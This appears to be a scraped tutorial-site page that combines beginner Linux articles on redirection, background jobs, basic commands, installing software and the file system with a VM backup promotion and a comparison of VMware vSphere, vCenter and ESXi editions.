It's not uncommon to want to redirect the output of a command to a text file for further processing. In the good old DOS operating system, this was achieved by using the '>' operator. Even today, with the latest Windows operating systems, you would open a DOS command prompt and use the same method!

The good news is that Linux also supports these functions without much difference in the command line.

For example, if we wanted to store the listing of a directory into a file, we would type the following: ls > dirlist.txt:

linux-introduction-avd-cmd-line-9

As you can see, we've taken the output of 'ls' and redirected it to our file. Let's now take a look and see what has actually been stored in there by using the command cat dirlist.txt :

linux-introduction-avd-cmd-line-10

As expected, the dirlist.txt file contains the output of our previous command. So you might ask yourself 'what if I need to append the results?' - No problem here, as we've already got you covered.

When there's a need for appending files or results, as in DOS we simply use the double >> operator. By using the command it will append the new output to the file we have specified in the command line:

linux-introduction-avd-cmd-line-11

The above example clearly shows the content of our file named 'document2' which is then appended to the previously created file 'dirlist.txt'. With the use of the 'cat' command, we are able to examine its contents and make sure the new data has been appended.

Note:

By default, the single > will overwrite the file if it exists, so if you give the ls > dirlist.txt command again, it will overwrite the first dirlist.txt. However, if you specify >> it will add the new output below the previous output in the file. This is known as output redirection.

In Windows and DOS you can only run one command at a time, however, in Linux you can run many commands simultaneously. For example, let's say we want to see the directory list, then delete all files ending with .txt, then see the directory list again.

This is possible in Linux using one statement as follows : ls -l; rm -f *.txt; ls -l . Basically you separate each command using a semicolon, ';'. Linux then runs all three commands one after the other. This is also known as command chaining.

Background Processes

If you affix an ampersand '&' to the end of any command, it will run in the background and not disturb you, there is no equivalent for this in Windows and it is very useful because it lets you start a command in the background and run other tasks while waiting for that to complete.

The only thing you have to keep in mind is that you will not see the output from the command on your screen since it is in the background, but we can redirect the output to a file the way we did two paragraphs above.

For example, if you want to search through all the files in a directory for the word 'Bombadil', but you want this task to run in the background and not interrupt you, you can type this: grep "Bombadil" *.* >> results.txt& . Notice that we've added the ampersand '&' character to the end of the command, so it will now run in the background and place the results in the file results.txt . When you press enter, you'll see something like this :

$ grep "Bombadil" *.* >> results.txt&

[1] 1272

linux-introduction-avd-cmd-line-12

Our screen shot confirms this. We created a few new files that contained the string 'Bombadil' and then gave the command grep "Bombadil" *.* >> results.txt& . The system accepted our command and placed the process in the background using PID (Process ID) 14976. When we next gave the 'ls' command to see the listing of our directory we saw our new file 'results.txt' which, as expected, contained the files and lines where our string was found.

If you run a 'ps' while this is executing a very complex command that takes some time to complete, you'll see the command in the list. Remember that you can use all the modifiers in this section with any combination of Linux commands, that's what makes it so powerful. You can take lots of simple commands and chain, pipe, redirect them in such a way that they do something complicated!

Our next article covers Linux File & Folder Permissions, alternatively you can visit our Linux section for more linux related technical articles.

 



  • Hits: 50603

Installing Software On Linux

Installing software in Linux is very different from Windows for one very simple reason: most Linux programs come in 'source code' form. This allows you to modify any program (if you're a programmer) to suit your purposes! While this is incredibly powerful for a programmer, for most of us who are not- we just want to start using the program!

Most programs will come 'zipped' just like they do in Windows, in other words they pack all the files together into one file and compress it to a more manageable size. Depending on the zipping program used, the method of unzipping may vary, however, each program will have step by step instructions on how to unpack it.

Most of the time the 'tar' program will be used to unpack a package and unzipping the program is fairly straightforward. This is initiated by typing 'tar -zxvf file-to-unzip.tgz' where 'file-to-unzip.tgz' is the actual filename you wish to unzip. We will explain the four popular options we've used (zxvf) but you can read the 'tar man' page if you are stuck or need more information.

As mentioned, the 'tar' program is used to unpack a package we've downloaded and would like to install. Because most packages use 'tar' to create one file for easy downloads, gzip (Linux's equivalent to the Winzip program) is used to compress the tar file (.gz), reducing the size and making it easier to transfer. This also explains the reason most files have extensions such as '.tgz' or '.tar.gz'.

To make life easy, instead of giving two commands to decompress (unzip) and unpack the package, we provide tar with the -z option to automatically unzip to package and then proceed with unpacking it (-x). Here are the options in greater detail:

-z : Unzip tar package before unpacking it.

-x : Extract/Unpack the package

-v : Verbosely list files processed

-f : use archive file (filename provided)

linux-introduction-installing-software-1

Because the list of files was long, we've cut the bottom part to make it fit in our small window.

Once you have unzipped the program, go into its directory and look for a file called INSTALL, most programs will come with this file. It contains detailed instructions on how to install it, including the necessary commands to be typed, depending on the Linux distribution you have. After you've got that out of the way, you're ready to use the three magic commands that install 99% of all software in Linux :)

Open the program directory and type ./configure. [1st magic command]

linux-introduction-installing-software-2

You'll see a whole lot of output that you may not understand; this is when the software you're installing is automatically checking your system to analyze the options that will work best. Unlike the Windows world, where programs are made to work on a very general computer, Linux programs automatically customize themselves to fit your system.

Think of it as the difference between buying ready-made clothes and having tailor made clothes especially designed for you. This is one of the most important reasons why programs are in the 'source code' form in Linux.

In some cases, the ./configure command will not succeed and will produce errors that will not allow you to take the step and compile your program. In these cases, you must read the errors, fix any missing library files (most common causes) or problems and try again:

linux-introduction-installing-software-3

As you can see, we've run into a few problems while trying to configure this program on our lab machine, so we looked for a different program that would work for the purpose of this demonstration!

linux-introduction-installing-software-4

 

This ./configure finished without any errors, so the next step is to type make. [2nd magic command]

linux-introduction-installing-software-5

This simple command will magically convert the source code into a useable program... the best analogy of this process is that in the source code are all the ingredients in a recipe, if you understand programming, you can change the ingredients to make the dish better. Typing the make command takes the ingredients and cooks the whole meal for you! This process is known as 'compiling' the program

If make finishes successfully, you will want to put all the files into the right directories, for example, all the help files in the help files directory, all the configuration files in the /etc directory (covered in the pages that follow).

To perform this step, you have to log in as the superuser or 'root' account, if you don't know this password you can't do this.

Assuming you are logged in as root, type make install. [3rd magic command]

linux-introduction-installing-software-6

Lastly, once our program has been configured, compiled and installed in /usr/local/bin with the name of 'bwn-ng', we are left with a whole bunch of extra files that are no longer useful, these can be cleaned using the make clean command - but this, as you might have guessed, is not considered a magic command :)

linux-introduction-installing-software-7

 There, that's it!

Now here's the good news... that was the old hard way!

All the people involved with Linux realised that most people don't need to read the source code and change the program and don't want to compile programs, so they have a new way of distributing programs in what is known as 'rpm' (red hat package manager) format.

This is one single file of a pre-compiled program, you just have to double click the rpm file (in the Linux graphical interface - X) and it will install it on your system for you!

In the event that you find a program that is not compiling with 'make' you can search on the net (we recommend www.pbone.net ) for an rpm based on your Linux distribution and version. Installation then is simply one click away for the graphical X desktop, or one command away for the hardcore Linux enthusiasts!

Because the 'rpm' utility is quite complex with a lot of flags and options, we would highly recommend you read its 'man' page before attempting to use it to install a program.

One last note about rpm is that it will also check to see if there are any dependent programs or files that should or shouldn't be touched during an install or uninstall. By doing so, it is effectively protecting your operating system from accidentally overwriting or deleting a critical system file, causing a lot of problems later on!

For those looking for a challenge, our next article covers Advanced Linux Commands and explores commands most used with the administration of the Linux operating system. Alternatively you can visit our Linux section to get access to a variaty of Linux articles.

  • Hits: 24730

The Linux Command Line

You could actually skip this whole section for those who are already familiar with the topic, but we highly recommend you read it because this is the heart of Linux. We also advise you to go through this section while sitting in front of the computer.

Most readers will be familiar with DOS in Windows and opening a DOS box. Well, let's put it this way.. comparing the power of the Linux command line with the power of the DOS prompt is like comparing a Ferrari with a bicycle!

People may tell you that the Linux command line is difficult and full of commands to remember, but it's the same thing in DOS and just remember - you can get by in Linux without ever opening a command line (just like you can do all your work in Windows without ever opening a DOS box !). However, the Linux command line is actually very easy, logical and once you have even the slightest ability and fluency with it, you'll be amazed as to how much faster you can do complicated tasks than you would be able to with the fancy point-and-click graphics and mouse interface.

To give you an example, imagine the number of steps it would take you in Windows to find a file that has the word "hello" at the end of a line, open that file, remove the first ten lines, sort all the other lines alphabetically and then print it. In Linux, you could achieve this with a single command! - Have we got your attention yet ?!

Though you might wonder what you could achieve by doing this - the point is that you can do incredibly complicated things by putting together small commands, exactly like using small building blocks to make a big structure.

We'll show you a few basic commands to move around the command line as well as their equivalents in Windows. We will first show you the commands in their basic form and then show you how you can see all the options to make them work in different ways.

The Basic Commands

As a rule, note that anything typed in 'single quotes and italics' is a valid Linux command to be typed at the command line, followed by Enter.

We will use this rule throughout all our tutorials to avoid confusion and mistakes. Do not type the quotes and remember that, unlike Windows, Linux is case sensitive, thus typing ‘Document' is different from typing 'document'.

•  ls - You must have used the 'dir' command on Windows... well this is like 'dir' command on steroids! If you type 'ls' and press enter you will see the files in that directory, there are many useful options to change the output. For example, 'ls -l' will display the files along with details such as permissions (who can access a file), the owner of the file(s), date & time of creation, etc. The 'ls' command is probably the one command you will use more than any other on Linux. In fact, on most Linux systems you can just type 'dir' and get away with it, but you will miss out on the powerful options of the 'ls' command.

linux-introduction-cmd-line-1

 

•  cd - This is the same as the DOS command: it changes the directory you are working in. Suppose you are in the '/var/cache' directory and want to go to its subfolder 'samba' , you can type 'cd samba' just as you would if it were a DOS system.

linux-introduction-cmd-line-2

Imagine you were at the '/var/cache' directory and you wanted to change to the '/etc/init.d' directory in one step, you could just type 'cd /etc/init.d' as shown above. On the other hand, if you just type 'cd' and press enter, it will automatically take you back to your personal home directory (this is very useful as all your files are usually stored there).

We also should point out that while Windows and DOS use the well known back-slash ' \ ' in the full path address, Linux differentiates by using the forward-slash ' / '. This explains why we use the command 'cd /etc/init.d' and not 'cd \etc\init.d' as most Windows users would expect.

•  pwd - This will show you the directory you are currently in, should you forget. It's almost like asking the operating system 'Where am I right now ?'. It will show you the 'present working directory'.

linux-introduction-cmd-line-3

 

•  cp - This is the equivalent of the Windows 'copy' command. You use it to copy a file from one place to another. So if you want to copy a file called 'document' to another file called 'document1' , you would need to type 'cp document document1'. In other words, first the source, then the destination.

linux-introduction-cmd-line-4

The 'cp' command will also allow you to provide the path to copy it to. For example, if you wanted to copy 'document' to the home directory of user1, you would then type 'cp document /home/user1/'. If you want to copy something to your home directory, you don't need to type the full path (example /home/yourusername), you can use the shortcut '~' (tilda), so to copy 'document' to your home directory, you can simply type 'copy document ~' .

 

•  rm - This is the same as the 'del' or 'delete' command in Windows. It will delete the files you input. So if you need to delete a file named 'document', you type 'rm document'. The system will ask if you are sure, so you get a second chance! If you typed 'rm –f' then you will force (-f) the system to execute the command without requiring confirmation, this is useful when you have to delete a large number of files.

linux-introduction-cmd-line-5

In all Linux commands you can use the '*' wildcard that you use in Windows, so to delete all files ending with .txt in Windows you would type 'del *.txt' whereas in Linux you would type 'rm -f *.txt'. Remember, we used the '-f' flag because we don't want to be asked to confirm the deletion of each file.

linux-introduction-cmd-line-6

To delete a folder, you have to give rm the '-r' (recursive) option; as you might have already guessed, you can combine options like this: 'rm -rf mydirectory'. This will delete the directory 'mydirectory' (and any subdirectories within it) and will not ask you twice. Combining options like this works for all Linux commands.

 

•mkdir / rmdir - These two commands are the equivalent of Windows' 'md' and 'rd', which allow you to create (md) or remove (rd) a directory. So if you type 'mkdir firewall', a directory will be created named 'firewall'. On the other hand, type 'rmdir firewall' and the newly created directory will be deleted. We should also note that the 'rmdir' command will only remove an empty directory, so you might be better off using 'rm -rf' as described above.

linux-introduction-cmd-line-7

 

•mv - This is the same as the 'move' command on Windows. It works like the 'cp' or copy command, except that after the file is copied, the original source file is deleted. By the way, there is no rename command on Linux because technically moving and renaming a file is the same thing!

In this example, we recreated the 'firewall' directory we deleted previously and then tried renaming it to 'firewall-cx'. Lastly, the new directory was moved to the '/var' directory:

linux-introduction-cmd-line-8

That should be enough to let you move around the command line or the 'shell', as it's known in the Linux community. You'll be pleased to know that there are many ways to open a shell window from the ‘X' graphical desktop, which can be called an xterm, or a terminal window.

•  cat / more / less - These commands are used to view files containing text or code. Each command will allow you to perform a special function that is not available with the others so, depending on your work, some might be used more frequently than others.

The 'cat' command will show you the contents of any file you select. This command is usually used in conjunction with other advanced commands such as 'grep' to look for a specific string inside a large file which we'll be looking at later on.

When issued, the 'cat' command will run through the file without pausing until it reaches the end, just like a file scanner that examines the contents of a file while at the same time showing the output on your screen:

linux-introduction-cmd-line-9

In this example, we have a whopper 215kb text file containing the system's messages. We issued the 'cat messages' command and the file's content is immediately listed on our screen, only this went on for a minute until the 'cat' command reached the end of the file and then exited.

Not much use for this example, but keep in mind that we usually pipe the output to other commands in order to give us some usable results :)

'more' is used in a similar way, but will pause the screen when it has filled with text, in which case we need to hit the space bar or enter key to continue scrolling per page or line. The 'up' or 'down' arrow keys are of no use for this command and will not allow you to scroll through the file - it's pretty much a one way scrolling direction (from the beginning to the end) with the choice of scrolling per page (space bar) or line (enter key).

The 'less' command is an enhanced version of 'more', and certainly more useful. With the less command, you are able to scroll up or down a file's content. To scroll down per page, you can make use of the space bar, or CTRL-D. To scroll upwards towards the beginning of the file, use CTRL-U.

It is not possible for us to cover all the commands and their options because there are thousands! However, we will teach you the secret to using Linux -- that is, how to find the right tool (command) for a job, and how to find help on how to use it.

Can I Have Some Help Please?

To find help on a command, you type the command name followed by '--help'. For example, to get help on the 'mkdir' command, you will type 'mkdir --help'. But there is a much more powerful way...

For those who read our previous section, remember we told you that Linux stores all files according to their function? Well Linux stores the manuals (help files) for every program installed, and the best part is that you can look up the 'man pages' (manuals) very easily. All the manuals are in the same format and show you every possible option for a command.

To open the manual of a particular command, type 'man' followed by the command name, so to open the manual for 'mkdir' type 'man mkdir':

linux-introduction-cmd-line-10

Interestingly, try getting help on the 'man' command itself by typing 'man man'. This is the most authoritative and comprehensive source of help for anything you have in Linux, and the best part is that every program will come with its manual! Isn't this so much better than trying to find a help file or readme.txt file :) ?

Here's another incredibly useful command -- if you know the task you want to perform, but don't know the command or program to use, use the 'apropos' command. This command will list all the programs on the system that are related to the task you want to perform. For example, say you want to send email but don't know the email program, you can type 'apropos email' and receive a list of all the commands and programs on the system that will handle email! There is no equivalent of this on Windows.

Searching for Files in Linux?

Another basic function of any operating system is knowing how to find or search for a missing or forgotten file, and if you have already asked yourself this question, you'll be pleased to find out the answer :)

The simplest way to find any file in Linux is to type 'locate' followed by the filename. So if you want to find a file called 'document' , you type 'locate document'. The locate command works using a database that is usually built when you are not using your Linux system, indexing all your files and directories to help you locate them.

You can use the more powerful 'find' command, but I would suggest you look at its 'man' page first by typing 'man find'. The 'find' command differs from the 'locate' command in that it does not use a database, but actually looks for the file(s) requested by scanning the whole directory or file system depending on where you execute the command.

Logically, the 'locate' command is much faster when looking for a file that has already been indexed in its database, but will fail to discover any new files that have just been installed since they haven't been indexed! This is where the 'find' command comes to the rescue!

Our next article covers  Installing Software on Linux, alternatively you can head back to our Linux Section.

 

  • Hits: 35235

The Linux File System

A file system is nothing more than the way the computer stores and retrieves all your files. These files include your documents, programs, help files, games, music etc. In the Windows world we have the concept of files and folders.

A folder (also known as a directory) is nothing more than a container for different files so that you can organise them better. In Linux, the same concept holds true -- you have files, and you have folders in which you organise these files.

The difference is that Windows stores files in folders according to the program they belong to (in most cases), in other words, if you install a program in Windows, all associated files -- such as the .exe file that you run, the help files, configuration files, data files etc. go into the same folder. So if you install for example Winzip, all the files relating to it will go into one folder, usually c:\Program Files\Winzip.

In Linux however, files are stored based on the function they perform. In other words, all help files for all programs will go into one folder made just for help files, all the executable (.exe) files will go into one folder for executable programs, all programs configuration files will go into a folder meant for configuration files.

This layout has a few significant advantages as you always know where to look for a particular file. For example, if you want to find the configuration file for a program, you'll bound to find it in the actual program's installation directory.

With the Windows operating system, it's highly likely the configuration file will be placed in the installation directory or some other Windows system subfolder. In addition, registry entries is something you won't be able to keep track of without the aid of a registry tracking program - something that does not exist in the Linux world since there is no registry!

Of course in Linux everything is configurable to the smallest level, so if you choose to install a program and store all its files in one folder, you can, but you will just complicate your own life and miss out on the benefits of a file system that groups files by the function they perform rather than arbitrarily.

Linux uses an hierarchical file system, in other words there is no concept of 'drives' like c: or d:, everything starts from what is called the ‘/' directory (known as the root directory). This is the top most level of the file system and all folders are placed at some level from here. This is how it looks:

linux-introduction-file-system-1

 As a result of files being stored according to their function on any Linux system, you will see many of the same folders.

These are 'standard' folders that have been pre-designated for a particular purpose. For example the 'bin' directory will store all executable programs (the equivalent of Windows ‘.exe ' files).

Remember also that in Windows you access directories using a backslash (eg c:\Program Files) whereas in Linux you use a forward slash (eg: /bin ).

In other words you are telling the system where the directory is in relation to the root or top level folder.

So to access the cdrom directory according to the diagram on the left you would use the path /mnt/cdrom.

To access the home directory of user 'sahir' you would use /home/sahir.

 

 

 

 

So it's now time to read a bit about each directory function to help us get a better understanding of the operating system:

• bin - This directory is used to store the system's executable files. Most users are able to access this directory as it does not usually contain system critical files.

• etc - This folder stores the configuration files for the majority of services and programs run on the machine. These configuration files are all plain text files that you can open and edit the configuration of a program instantly. Network services such as samba (Windows networking), dhcp, http (apache web server) and many more, rely on this directory! You should be careful with any changes you make here.

• home - This is the directory in which every user on the system has his own personal folder for his own personal files. Think of it as similar to the 'My Documents' folder in Windows. We've created one user on our test system by the name of 'sahir' - When Sahir logs into the system, he'll have full access to his home directory.

• var - This directory is for any file whose contents change regularly, such as system log files - these are stored in /var/log. Temporary files that are created are stored in the directory /var/tmp.

• usr - This is used to store any files that are common to all users on the system. For example, if you have a collection of programs you want all users to access, you can put them in the directory /usr/bin. If you have a lot of wallpapers you want to share, they can go in /usr/wallpaper. You can create directories as you like.

• root - This can be confusing as we have a top level directory ‘/' which is also called ‘the root folder'.

The 'root' (/root) directory is like the 'My Documents' folder for a very special user on the system - the system's Administrator, equivalent to Windows 'Administrator' user account.

This account has access to any file on the system and can change any setting freely. Thus it is a very powerful account and should be used carefully. As a good practice, even if you are the system Administrator, you should not log in using the root account unless you have to make some configuration changes.

It is a better idea to create a 'normal' user account for your day-to-day tasks since the 'root' account is the account for which hackers always try to get the password on Linux systems because it gives them unlimited powers on the system. You can tell if you are logged in as the root account because your command prompt will have a hash '#' symbol in front, while other users normally have a dollar '$' symbol.

• mnt - We already told you that there are no concepts of 'drives' in Linux. So where do your other hard-disks (if you have any) as well as floppy and cdrom drives show up?

Well, they have to be 'mounted' or loaded for the system to see them. This directory is a good place to store all the 'mounted' devices. Taking a quick look at our diagram above, you can see we have mounted a cdrom device so it is showing in the /mnt directory. You can access the files on the cdrom by just going to this directory!

• dev - Every system has its devices, and the Linux O/S is no exeption to this! All your systems devices such as com ports, parallel ports and other devices all exist in /dev directory as files and directories! You'll hardly be required to deal with this directory, however you should be aware of what it contains.

• proc - Think of the /proc directory as a deluxe version of the Windows Task Manager. The /proc directoy holds all the information about your system's processes and resources. Here again, everything exists as a file and directory, something that should't surprise you by now!

By examining the appropriate files, you can see how much memory is being used, how many tcp/ip sessions are active on your system, get information about your CPU usage and much more. All programs displaying information about your system use this directory as their source of information!

• sbin - The /sbin directory's role is that similar to the /bin directory we covered earlier, but with the difference its only accessible by the 'root' user. Reason for this restriction as you might have already guessed are the sensitive applications it holds, which generally are used for the system's configuration and various other important services. Consider it an equivelant to the Windows Administration tools folder and you'll get the idea.

Lastly, if you've used a Linux system, you'll have noticed that not many files have an extension - that is, the three letters after the dot, as found in Windows and DOS: file1.txt , winword.exe , letter.doc.

While you can name your files with extensions, Linux doesn't really care about the 'type' of file. There are very quick ways to instantly check the type of file anything is. You can even make just about any file in Linux an executable or .exe file at whim!

Linux is smart enough to recognise the purpose of a file so you don't need to remember the meaning of different extensions.

You have now covered the biggest hurdle faced by new Linux users. Once you get used to the file system you'll find it is a very well organised system that makes storing files a very logical process. There is a system and, as long as you follow it, you'll find most of your tasks are much simpler than other operating system tasks. Our next article, The Linux Command Line explores the Linux command, commands, options and much more. Alternativerly you can head back to our Linux section to find more technical articles covering the Linux operating system.

  • Hits: 37939

Why Use Linux?

The first question is - what are the benefits of using Linux instead of Windows? This is in fact a constant debate between the Windows and Linux communities and while we won't be taking either side, you'll discover that our points will favour the Linux operating system because they are valid :)

Of course, if you don't agree, our forums have a dedicated Linux section where we would happily discuss it with you!

Reasons for using Linux ....

While we could list a billion technical reasons, we will focus on those that we believe will affect you most:

•Linux is free. That's right - if you never knew it, the Linux operating system is free of charge. No user or server licenses are required*! If, however, you walk into an IT shop or bookstore, you will find various Linux distributions on the shelf available for purchase, that cost is purely to cover the packaging and possible support available for the distribution.

* We must note that the newer 'Advanced Linux Servers', now available from companies such as Redhat, actually charge a license fee because of the support and update services they provide for the operating system. In our opinion, these services are rightly charged since they are aimed at businesses that will use their operating system in critical environments where downtime and immediate support is non-negotiable.

•Linux is developed by hundreds of thousands of people worldwide. Because of this community development mode there are very fresh ideas going into the operating system and many more people to find glitches and bugs in the software than any commercial company could ever afford (yes, Microsoft included).

•Linux is rock solid and stable, unlike Windows, where just after you've typed a huge document it suddenly crashes, making you loose all your work!

Runtime errors and crashes are quite rare on the Linux operating system due to the way its kernel is designed and the way processes are allowed to access it. No one can guarantee that your Linux desktop or server will not crash at all, because that would be a bit extreme, however, we can say that it happens a lot less frequently in comparison with other operating systems such as Windows.

For the fanatics of the 'blue screen of death' - you'll be disappointed to find out there is no such thing in the world of Linux. However, not all is lost as there have been some really good 'blue screen of death' screen savers out for the Linux graphical X Windows system.

You could also say that evidence of the operating system's stability is the fact that it's the most widely used operating system for running important services in public or private sectors. Worldwide statistics show that the number of Linux web servers outweigh by far all other competitors:

linux-introduction-why-use-linux-1

Today, netcraft reports that for the month of June 2005, out of a total of 64,808,485 Web servers, 45,172,895 are powered by Apache while only 13,131,043 use Microsoft's IIS Web server!

•Linux is much more secure than Windows, there are almost no viruses for Linux and, because there are so many people working on Linux, whenever a bug is found, a fix is provided much more quickly than with Windows. Linux is much more difficult for hackers to break into as it has been designed from the ground up with security in mind.

•Linux uses less system resources than Windows. You don't need the latest, fastest computer to run Linux. In fact you can run a functional version of Linux from a floppy disk with a computer that is 5-6 years old! At this point, we can also mention that one of our lab firewalls still runs on a K6-266 -3DNow! processor with 512 MB Ram! Of course - no graphical interfaces are loaded as we only work on in CLI mode!

•Linux has been designed to put power into the hands of the user so that you have total control of the operating system and not the other way around. A person who knows how to use Linux has the computer far more 'by the horns' than any Windows user ever has.

•Linux is fully compatible with all other systems. Unlike Microsoft Windows, which is at its happiest when talking to other Microsoft products, Linux is not 'owned' by any company and thus it keeps its compatibility with all other systems. The simplest example of this is that a Windows computer cannot read files from a hard-disk with the Linux file system on it (ext2 & ext3), but Linux will happily read files from a hard-disk with the Windows file system (fat, fat32 or ntfs file system), or for that matter any other operating system.

Now that we've covered some of the benefits of using Linux, let's start actually focusing on the best way to ease your migration from the Microsoft world to the Linux world, or in case you already have a Linux server running - start unleashing its full potential!

The first thing we will go over is the way Linux deals with files and folders on the hard-disk as this is completely different to the way things are done in Windows and is usually one of the challenges faced by Linux newbies.

 



  • Hits: 30878

8 Critical Features to Have in a VM Backup Solution

vm backup key featuresBusinesses that rely on virtual machines for their day-to-day operations should think twice about securing their infrastructure. Modern use of virtual machines stems from the benefits of virtualization, which include accessibility, reduced operating costs, and flexibility, among others. But your virtual infrastructure becomes obsolete without proper security. One way to achieve that is through virtual machine backup and recovery solutions.

VM backups are crucial for maintaining business continuity. They help businesses prevent data loss and offer a failsafe if something happens to your Hyper-V or VMware virtual infrastructure. These services aren't uncommon. But knowing which one to choose depends on several factors. None are more important than the product's features, which directly impact your ability to keep the infrastructure running.

So that begs the question, what are the essential features of a VM backup software? That's exactly what this short guide focuses on. So, let's dive in.

Key Topics:

Download now your free copy of the latest V9 VM backup now.

Ransomware Protection

Ransomware attacks are making the rounds, and cybersecurity blogs and experts talk extensively regarding the potential damage these attacks can do. A potential ransomware attack can render your data obsolete, locking it and demanding a ransom for releasing said data. Therefore, it becomes a necessity to protect against potential ransomware attacks. Luckily, ransomware protection is a core feature of the V9 VM backup.

The feature makes it impossible for malicious software to tamper with the data on your virtual machines. Moreover, the ransomware data protection feature prevents any user, even with admin or root access, from modifying or deleting the backup data on your backup server. With this level of protection against devastating malware, businesses add another layer of security to their virtual environment.

Storage Saving With Augmented Inline Deduplication Technology

Storage costs are a significant concern for businesses, and choosing a VM backup provider that offers massive storage-saving features is essential. Few storage-saving features are as comprehensive as the Augmented Inline Deduplication Technology with the V9 VM Backup. The feature works by eliminating redundant data, resulting in significant storage savings.

This technology uses machine learning to identify the changed data from the previous backup, thus backing up only the changed data to the customers' backup server or repository. In comparison, most VM backup and restore services approach the backup process differently, removing identical data after the transfer to the backup repository.

The benefits of the technology result in massive storage savings.

Cloud Backup

Continue reading

  • Hits: 6770

Differences Between VMware vSphere, vCenter, ESXi Free vs ESXi Paid, Workstation Player & Pro

vmware esxi vsphere vcenter introIn this article we will cover the differences between VMware ESXi, vSphere and vCenter while also explain the features supported by each vSphere edition: vSphere Standard, Enterprise plus and Plantium edition. We will touch on the differences and limitations between VMware Workstation Player and VMware Workstation Pro, and also compare them with EXSi Free and EXSi Paid editions.

Finally we will demystify the role of vCenter and the additional features it provides to a VMware infrastructure.

Key Topics:

Visit our Virtualization and Backup section for more high-quality technical articles.

vmware vsphere

Concerned about your VM machines and data? Download now your Free Enterprise-grade VM Backup solution

Related Articles:

Difference Between VMware vSphere & vCenter

It’s sometimes difficult to keep up to date with the latest names of software. Even the largest technology vendors change their product names from time to time. Unfortunately, getting the product name wrong can result in various costly consequences including purchasing the wrong product or an older version with differentiating feature sets.

Contrary to popular belief, vSphere and vCenter are actually different products:

  • vSphere is VMware’s name for a suite of Infrastructure products. You can think of it as a platform name which includes lots of different components.
  • vCenter is the name of one of the components under the vSphere suite. vCenter runs on a Windows Server VM and provides the management and control plane of the entire VMware environment. This is also shown in the diagram below:

differences between vsphere and vcenter

Looking at the vSphere suite, the components and features that vSphere includes depend on your licenses. vCenter Server is available on all vSphere editions.

Here is an overview of some features for the main vSphere editions:

vmware vsphere editions feature comparisonYou will notice that this vSphere feature table contains many different technologies which are found in different VMware software components.

vCenter is a management tool that helps manage multiple ESXi / vSphere Hypervisors within the datacentre. Earlier versions of vCenter (also known as vCenter Server) ran exclusively on Windows Server (shown in the previous diagram) whereas now VMware now offers the vCenter Server Appliance (vCSA) which runs on either SUSE Linux Enterprise Server 64-bit (vCSA v6.0) or VMware’s proprietary Photon OS (vCSA v6.5 and above).

You log in to vCenter Server via an HTML5 browser (formally a Flash client) which looks like this:

vmware vsphere login

From here, we can manage all vSphere related components (and their corresponding features) which include:

  • vCenter Server (vCSA)
  • vSphere Hypervisors (ESXi Servers)
  • vSphere Update Manager
  • vSphere Replication

So, in summary, the difference between vSphere and vCenter is that vSphere consists of a suite of VMware components with vCenter Server being one of those.

vCenter Server is the management software or if you prefer, tool, to help manage your vSphere Components and all their features.

You can use some vSphere components without a vCenter Server but some features will not be available.

What is VMware ESXi?

ESXi is a Type-1 Hypervisor which means it’s a piece of software that runs directly on a bare-metal server without the requirement of an operating system. As a Hypervisor, ESXi manages access to all physical resources such as CPUs, memory, network interface cards, storage (HDD, SSDs etc) and other.

ESXi’s vmkernel sits between the virtual machines and physical hardware and from there it shares the available hardware including CPUs, storage (HDDs, SSDs etc), memory and network interfaces of the physical host amongst the multiple virtual machines. Applications running in virtual machines can access these resources without direct access to the underlying hardware.

Vmkernel is the core software responsible of receiving requests from virtual machines for resources and presenting the requests to the physical hardware.

There are stricter compatibility requirements for ESXi installations as hardware drivers need to be certified. However once ESXi is installed and operational, you get access to Enterprise-grade Virtual Machines features.

vmware esxi server web guiVMware ESXi GUI Interface - Click to enlarge

VMware ESXi comes in a variety of flavours. A free version exists if you simply need to deploy basic Virtual Machines with no High Availability or central management requirements. This is best suited for trialling software and labs which are not in production.

For mission-critical applications, you should consider the paid version of ESXi which comes with VMware support and features geared toward professional environments. Add on VMware’s  vCenter Server enable central management all of your ESXi servers and take your datacentre one step further with features such as:

  • Clustering
  • High Availability
  • Fault Tolerance
  • Distributed Resource Scheduler
  • Virtual Machine Encryption

Difference Between VMware ESXi Free & ESXi Paid Version

The VMware ESXi free vs ESXi paid debate comes up a lot, but fortunately, it is easily answered.

The question to ask yourself is if you are planning to run mission-critical applications on top of ESXi. By mission-critical we mean applications that your business depends on. If the answer is yes, then you will require the paid version of ESXi with support so that you can contact VMware should anything go wrong.

Even if the answer is no, you might still consider a paid version of ESXi if you need the management functions of vCenter Server. Such use cases might be large development companies who don’t consider their test and development environments mission-critical but they do want a way to manage hundreds or thousands of Virtual Machines.

VMware ESXi free is still feature-rich though. Therefore for a small environment where your business won’t grind to a halt if an ESXi server goes offline, might be cost-effective even with additional manual management tasks to conduct. Keep in mind though that backup features will not be available in the free version, meaning that native backup via ESXi won’t be possible. You can work around this by installing and managing backup agents within your operating systems. This is one example of management overhead that you wouldn’t have with a paid version.

When Do You Need vCenter?

It’s worth keeping in mind that even with a paid version of ESXi, you will still need a vCenter Server license to use any clustering features. A paid version of ESXi does offer some benefits (such as VADP backup abilities) but without a vCenter Server license, most of the benefits are not available.

Almost all customers of paid ESXi licenses will also purchase a vCenter Server license so that those licenses ESXi servers can be centrally managed. Once all ESXi servers are managed by vCenter Server, you unlock all the ESXi features that you are licensed for.

So when do you need a vCenter Server? The answer is simple. To unlock features such as Clustering, High Availability (an automatic reboot of VMs on a failed host to a healthy host), Cloning and Fault Tolerance. If you are looking to add other VMware solutions to the datacentre including vSAN, vSphere Replication or Site Recovery Manager, then all of those solutions require access to a vCenter Server.

In summary, if you find that you need the paid ESXi version then you are most likely also going to need a vCenter Server license too. Fortunately, VMware provides discounted  Essentials and Essentials Plus bundles with a 3 host (physical servers) limit, these bundles include ESXi and a vCenter server license at a discounted rate to keep initial costs down.

Just by looking at the vSphere Client can you see the various vCenter related options which show the value added by bolting on vCenter to your stack of management software for your datacentre:

vmware vsphere client
VMware vsphere client - Click to enlarge

VMware Workstation Player vs VMware Workstation Pro

VMware Workstation Player is free software that lets you run a Virtual Machine on top of your own Windows PC’s Operating System. There are two versions of VMware Workstation Player; Workstation Player and Workstation Pro.

The key differences between these two versions are that with VMware Workstation Player you can only run one Virtual Machine on your computer at once and enterprise features are disabled.  VMware Workstation Pro on the other hand supports running multiple virtual machines at the same time plus a few more neat features mentioned below.

Here is what Workstation Pro looks like - notice how you can have many virtual machines running at once:

vmware workstation pro VMware Workstation Pro - Click to enlarge

